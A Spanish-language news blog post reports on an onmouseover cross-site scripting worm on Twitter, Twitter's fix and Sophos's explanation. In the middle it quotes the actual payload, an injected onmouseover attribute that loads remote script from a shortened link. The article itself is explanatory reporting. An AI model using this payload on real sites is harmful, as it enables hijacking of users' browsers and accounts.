Twitter reconocio una falla en su seguridad

El sitio oficial de twitter informó que el error fue provocado por un ataque a través de un “agujero” en su seguridad informática , el cual ya fue solucionado.

Los administradores del microblog solicitaron a los usuarios que informen a través de la cuenta @safety sobre cualquier problema con suscuentas.

Es que los usuarios de twitter se encontraron hoy con la sorpresa de un virus que se propagaba con rapidez. Se trata de uno desconocido que no se transmitió mediante las aplicaciones de PC o Mac ni por las de smartphones.

El virus se identificó por este link: http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:u002fu002fis.gdu002ffl9A7′)

Aunque en algunos casos el tweet aparecía en negro.

Algunos de los primeros usuarios en caer fueron @Hectortimerman, el diario español @el_pais y el periodista @andykusnetzoff que llama a no usar la red a través de la web.

Según la empresa de seguridad informática británica Sophos, el problema sedebe a la explotación de una vulnerabilidad que permite que se abran las páginas de terceros en el navegador sólo con mover el ratón por la página, es decir, sin necesidad de hacer clic, según informa Infobae Profesional.
Además, esta vulnerabilidad permite crear mensajes “ocultos” por bloques de color, conocidos como “tweets arco iris”.

Esta vulnerabilidad se aprovecha al escribir un código de JavaScript (“onmouseover”) dentro de una dirección URL. Es por eso que se aconsejaba desactivar las aplicaciones de javascript/css.

Fuente: Infobae

0 comentarios: